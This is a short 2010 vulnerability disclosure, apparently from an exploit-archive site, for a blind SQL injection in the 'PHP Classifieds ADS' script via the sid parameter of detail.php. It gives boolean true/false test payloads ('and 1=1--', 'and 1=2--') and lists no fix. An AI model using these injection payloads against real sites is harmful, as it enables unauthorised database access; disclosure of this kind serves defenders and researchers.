PHP Classifieds ADS (sid) Blind SQL Injection Vulnerability

2010-09-04 09:15:56

[~] Title: PHP CLASSIFIEDS ADS
[~] Price: $49
[~] Link : http://www.sellatsite.com/sellatsite/phpclass.asp
[~] Author: BorN To K!LL - h4ck3r
[~] 3xploit:

/detail.php?sid=[Blind-Injection]

[~] 3xample:

http://www.example.com/classi/detail.php?sid=80 and 1=1-- // True ,,

http://www.example.com/classi/detail.php?sid=80 and 1=2-- // False ,,

[~] Greetings:

string Greetings[x] = ("Dr.2" , "Q8 H4x0r" , "AsbMay's Group" , "darkc0de team" , "and all my friends");

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.